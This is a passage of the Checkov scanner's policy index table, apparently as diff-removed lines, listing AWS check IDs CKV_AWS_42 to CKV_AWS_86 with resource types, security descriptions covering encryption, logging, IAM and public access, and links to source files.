-| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) |
-| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) |
-| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) |
-| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) |
-| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | 
[NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
-| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) |
-| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
-| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) |
-| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) |
-| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) |
-| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
-| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | 
[EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
-| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) |
-| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) |
-| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) |
-| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) |
-| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) |
-| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) |
-| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) |
-| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image 
Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) |
-| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) |
-| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) |
-| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) |
-| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) |
-| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) |
-| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) |
-| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) |
-| 
272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) |
-| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) |
-| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) |
-| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
-| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) |
-| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) |
-| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) |
-| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) |
-| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) |
-| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
-| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) |
-| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | 
[IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
-| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) |
-| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 290 | 
CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) |
-| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | 
[IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) |
-| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure 
all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) |
-| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) |
-| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) |
-| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) |
-| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) |
-| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) |
-| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) |
-| 310 | CKV_AWS_67 | resource | aws_cloudtrail | 
Ensure CloudTrail is enabled in all Regions | Terraform | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailMultiRegion.py) |
-| 311 | CKV_AWS_68 | resource | AWS::CloudFront::Distribution | CloudFront Distribution should have WAF enabled | Cloudformation | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFEnabled.py) |
-| 312 | CKV_AWS_68 | resource | aws_cloudfront_distribution | CloudFront Distribution should have WAF enabled | Terraform | [WAFEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFEnabled.py) |
-| 313 | CKV_AWS_69 | resource | AWS::AmazonMQ::Broker | Ensure Amazon MQ Broker should not have public access | Cloudformation | [AmazonMQBrokerPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py) |
-| 314 | CKV_AWS_69 | resource | aws_mq_broker | Ensure MQ Broker is not publicly exposed | Terraform | [MQBrokerNotPubliclyExposed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerNotPubliclyExposed.py) |
-| 315 | CKV_AWS_70 | resource | aws_s3_bucket | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
-| 316 | CKV_AWS_70 | resource | aws_s3_bucket_policy | Ensure S3 bucket does not allow an action with any Principal | Terraform | [S3AllowsAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py) |
-| 317 | CKV_AWS_71 | resource | AWS::Redshift::Cluster | Ensure Redshift Cluster logging is enabled | Cloudformation | 
[RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterLogging.py) |
-| 318 | CKV_AWS_71 | resource | aws_redshift_cluster | Ensure Redshift Cluster logging is enabled | Terraform | [RedshiftClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterLogging.py) |
-| 319 | CKV_AWS_72 | resource | aws_sqs_queue_policy | Ensure SQS policy does not allow ALL (*) actions. | Terraform | [SQSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSPolicy.py) |
-| 320 | CKV_AWS_73 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
-| 321 | CKV_AWS_73 | resource | AWS::Serverless::Api | Ensure API Gateway has X-Ray Tracing enabled | Cloudformation | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayXray.py) |
-| 322 | CKV_AWS_73 | resource | aws_api_gateway_stage | Ensure API Gateway has X-Ray Tracing enabled | Terraform | [APIGatewayXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayXray.py) |
-| 323 | CKV_AWS_74 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Cloudformation | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBEncryption.py) |
-| 324 | CKV_AWS_74 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted at rest (default is unencrypted) | Terraform | [DocDBEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryption.py) |
-| 325 | CKV_AWS_75 | resource | 
aws_globalaccelerator_accelerator | Ensure Global Accelerator accelerator has flow logs enabled | Terraform | [GlobalAcceleratorAcceleratorFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlobalAcceleratorAcceleratorFlowLogs.py) |
-| 326 | CKV_AWS_76 | resource | AWS::ApiGateway::Stage | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 327 | CKV_AWS_76 | resource | AWS::Serverless::Api | Ensure API Gateway has Access Logging enabled | Cloudformation | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 328 | CKV_AWS_76 | resource | aws_api_gateway_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 329 | CKV_AWS_76 | resource | aws_apigatewayv2_stage | Ensure API Gateway has Access Logging enabled | Terraform | [APIGatewayAccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAccessLogging.py) |
-| 330 | CKV_AWS_77 | resource | aws_athena_database | Ensure Athena Database is encrypted at rest (default is unencrypted) | Terraform | [AthenaDatabaseEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py) |
-| 331 | CKV_AWS_78 | resource | AWS::CodeBuild::Project | Ensure that CodeBuild Project encryption is not disabled | Cloudformation | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CodeBuildProjectEncryption.py) |
-| 332 | CKV_AWS_78 | resource | aws_codebuild_project | 
Ensure that CodeBuild Project encryption is not disabled | Terraform | [CodeBuildProjectEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py) |
-| 333 | CKV_AWS_79 | resource | AWS::EC2::LaunchTemplate | Ensure Instance Metadata Service Version 1 is not enabled | Cloudformation | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py) |
-| 334 | CKV_AWS_79 | resource | aws_instance | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 335 | CKV_AWS_79 | resource | aws_launch_configuration | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 336 | CKV_AWS_79 | resource | aws_launch_template | Ensure Instance Metadata Service Version 1 is not enabled | Terraform | [IMDSv1Disabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IMDSv1Disabled.py) |
-| 337 | CKV_AWS_80 | resource | AWS::MSK::Cluster | Ensure MSK Cluster logging is enabled | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py) |
-| 338 | CKV_AWS_80 | resource | aws_msk_cluster | Ensure MSK Cluster logging is enabled | Terraform | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterLogging.py) |
-| 339 | CKV_AWS_81 | resource | AWS::MSK::Cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Cloudformation | 
[MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py) | -| 340 | CKV_AWS_81 | resource | aws_msk_cluster | Ensure MSK Cluster encryption in rest and transit is enabled | Terraform | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py) | -| 341 | CKV_AWS_82 | resource | AWS::Athena::WorkGroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 342 | CKV_AWS_82 | resource | aws_athena_workgroup | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption | Terraform | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py) | -| 343 | CKV_AWS_83 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch Domain enforces HTTPS | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 344 | CKV_AWS_83 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 345 | CKV_AWS_83 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain enforces HTTPS | Terraform | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py) | -| 346 | CKV_AWS_84 | resource | AWS::Elasticsearch::Domain | Ensure Elasticsearch 
Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 347 | CKV_AWS_84 | resource | AWS::OpenSearchService::Domain | Ensure Elasticsearch Domain Logging is enabled | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 348 | CKV_AWS_84 | resource | aws_elasticsearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 349 | CKV_AWS_84 | resource | aws_opensearch_domain | Ensure Elasticsearch Domain Logging is enabled | Terraform | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDomainLogging.py) | -| 350 | CKV_AWS_85 | resource | AWS::DocDB::DBCluster | Ensure DocumentDB Logging is enabled | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py) | -| 351 | CKV_AWS_85 | resource | aws_docdb_cluster | Ensure DocumentDB Logging is enabled | Terraform | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBLogging.py) | -| 352 | CKV_AWS_86 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution has Access Logging enabled | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py) | -| 353 | CKV_AWS_86 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has Access Logging enabled | Terraform | 
